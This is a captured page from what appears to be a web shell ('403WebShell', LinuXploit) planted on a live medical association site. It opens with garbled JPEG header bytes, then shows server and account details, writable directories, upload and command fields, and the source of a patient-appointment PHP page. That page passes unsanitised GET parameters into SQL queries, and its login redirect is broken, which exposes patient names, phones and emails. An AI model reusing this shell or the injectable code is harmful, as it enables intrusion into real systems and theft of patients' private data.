JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 153.92.12.251  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/pasien.php
<?php include "header.php"; 
	// cek apakah yang mengakses halaman ini sudah login
	if($_SESSION['level']<>"user"){
		header("location:location:../login.php");
	}
?>
<!DOCTYPE html>

<div class="container">
	<div class="panel panel-primary">
				<nav class="navbar navbar-inverse">
    <div class="container-fluid">
	<br>
     <div class="navbar-header">
      <a class="navbar-brand" href="index.php">Ikatan Dokter Indonesia</a>
    </div>
  </div>
</nav>
	  <div class="panel-body">
<html>
<head>
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
		<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
		<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
	 	<script>
<!--
$( function() {
	    		$( "#datepicker" ).datepicker({ dateFormat: 'yy-mm-dd' });
	    		$( "#datepicker2" ).datepicker({ dateFormat: 'yy-mm-dd' });
				$( "#datepicker3" ).datepicker({ dateFormat: 'yy-mm-dd' });
	  		} );

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}
//-->
</script>
		
	
		
		
</head>
<body>
	<style type="text/css">
	
	#form-div {

	background:;
	padding-left:35px;
	padding-right:35px;
	padding-top:35px;
	padding-bottom:50px;
	width: 300px;
	float: center;

}
#button-blue{
	font-family: 'Montserrat', Arial, Helvetica, sans-serif;
	float:left;
	width: 100%;
	height:50px;
	border: #fbfbfb solid 4px;
	cursor:pointer;
	background-color: #3498db;
	color:white;
	font-size:14px;

}

	body{
		font-family: roboto;
		font-size: 12px;
	}
 
	table{
		margin: 0px auto;
	}
	</style>
 
<?php 
  $today = date('Y-m-d');
?>
   
   <br /><br />
 

<center><h4>DATA Pasien  </h4></center> 
		<br/><br/><br/>
 
 
<div id="form-div"> 
 
		<form method="get">
			<label>PILIH TANGGAL</label>
            <br>
		    <input name="npm" class="" type="hidden" value="<?php echo $npm  ?>" size="11">
          
            <input name="tanggal" class="form-control" type="date" id="" value="<?php echo $today  ?>" size="11">
 <br>
			<input  id="button-blue" type="submit" value="FILTER">
		</form>
</div> 
		<br/> <br/>

    <?php
  $npm = isset($_GET['npm']) ? $_GET['npm'] : '';
  $tanggal = isset($_GET['tanggal']) ? $_GET['tanggal'] : $today;
  $hariini = date('Y-m-d');
  
			 $no=0;
				
//	$query_pasien=$konek->query("SELECT * FROM d_janji where npm='$npm' AND tgl_reg >= '$hariini'  group by wilker");					   
		$query_pasien=$konek->query("SELECT * FROM d_janji where npm='$npm' AND tgl_reg='$tanggal'  group by wilker");					  
					   
						   
			 	while ($dp=$query_pasien->fetch_assoc()) {
			      
			      $id=$dp['id'];
				  $inpm = $dp['npm'];
				   $psn = $dp['pasien'];
				  $wilker = $dp['wilker'];
				  $hari = $dp['hari'];
				  $jam = $dp['jam1'];
			      
	//		      $query_absen=$konek->query("SELECT * FROM d_janji where wilker='$wilker'  AND tgl_reg >= '$hariini' order by noant");
				      $query_absen=$konek->query("SELECT * FROM d_janji where wilker='$wilker' AND tgl_reg='$tanggal' order by noant");
		      
			      $cek = $query_absen->num_rows;
			      if ($cek!==0) {
				  ?>
			 
	  	          
				        <table id="example" class="display nowrap table-striped table-bordered table" style="width:100%">

							<h2> <?php echo $wilker ?></h2>
                            <h4><?php echo $hari ?></h4> 
                            <h4><?php echo $jam ?></h4> 
   <br>
       
			            <thead>
			               <tr>

			                <th>No</th>
			                <th>Tanggal</th>
			                <th>Nomor Antrian</th>
							<th>Pasien</th>
                            <th>telp</th>
                            <th>Email</th>
                            <th>Status</th>
			                <th>Action</th>
			               </tr>
			         </thead>
                   <tbody class="alert-success">
			          
			         
			<?php
			 $no=0;
			          while ($dd=$query_absen->fetch_assoc()) {
			            $no++;
						 $pasien = "$dd[pasien]";
			          
			            $telp = "$dd[telp]";
		             	$email = "$dd[email]";
						   ?>
						
			          <tr>
      
			                <td data-header='No'><?php echo $no ?></td>
                              <td data-header='Tanggal Daftar '> <?php echo $dd['tgl_reg']; ?></td>
                              <td data-header='No Antri '><?php echo $dd['noant']; ?></td>
			                <td data-header='Nama Pasien '><a href='d_pasien.php?npm=<?php echo $dd['npm']; ?>&idpsn=<?php echo $dd['id_psn']; ?>'><?php echo $pasien ?></a></td>
			                <td data-header='Telp'><?php echo $telp?></td>
			                <td data-header='Email'><?php echo $email ?></td>
                             
                            
							<?php 
									if($dd['status'] == 'daftar'){
										 ?>
					<td data-header='Status'><span class='merah'><?php echo $dd['status']; ?></span></td>

										<?php 
									}else{		
										?>
							<td data-header='Status'><?php echo $dd['status']; ?></td>
                            
									<?php 	 
									}
										 ?>
                             
                             
                            <td data-header='Konfirmasi'> <a class='btn btn-success btn-sm' href='valid1.php?id=<?php echo $dd['id']; ?>&npm=<?php echo $dd['npm']; ?>'>Konf Hadir</a></td>
			               
			              </tr>
						  <?php   
			          }
					   ?>  
					 </tbody>  
			        </table>
					  <?php
			      	}
				}
				
	    ?>   
        <br>  <br>    <br>   
		</div> 




 </div>

		
	  

	  
	
	          </div>
          </div>
      </div>
      </div>	
    </div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit